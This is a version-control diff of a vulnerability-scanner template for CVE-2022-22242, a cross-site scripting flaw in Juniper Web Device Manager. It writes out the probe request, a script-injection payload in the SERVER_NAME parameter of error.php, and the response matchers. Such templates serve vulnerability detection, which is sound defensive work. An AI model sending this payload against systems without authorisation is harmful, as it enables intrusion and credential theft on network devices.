Update CVE-2022-22242.yaml

2022-10-28 21:07:02 +05:30 · 2022-10-28 21:07:02 +05:30 · 5b4c8b80fc
parent b76f5c9a65
commit 5b4c8b80fc
1 changed files with 14 additions and 11 deletions
--- a/cves/2022/CVE-2022-22242.yaml
+++ b/cves/2022/CVE-2022-22242.yaml
@ -1,34 +1,37 @@
-id: junos-web-xss
+id: juniper-web-xss

 info:
-  name: JunOS Web - Cross-Site Scripting
+  name: Juniper Web Device Manager - Cross-Site Scripting
  author: EvergreenCartoons
  severity: high
-  description: JunOS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
+  description: Juniper Web Device Manager contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
-  tags: xss,juniper,junos
+  tags: xss,juniper

 requests:
  - method: GET
    path:
-      - '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(/xss/)</script>'
+      - '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(document.domain)</script>'
+
    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
-
      - type: word
-        words:
-          - "<script>alert(/xss/)</script>"
        part: body
+        words:
+          - "<script>alert(document.domain)</script>"
+          - "The requested resource is not authorized to view"
+        condition: and

      - type: word
        words:
          - "text/html"
        part: header
+
+      - type: status
+        status:
+          - 200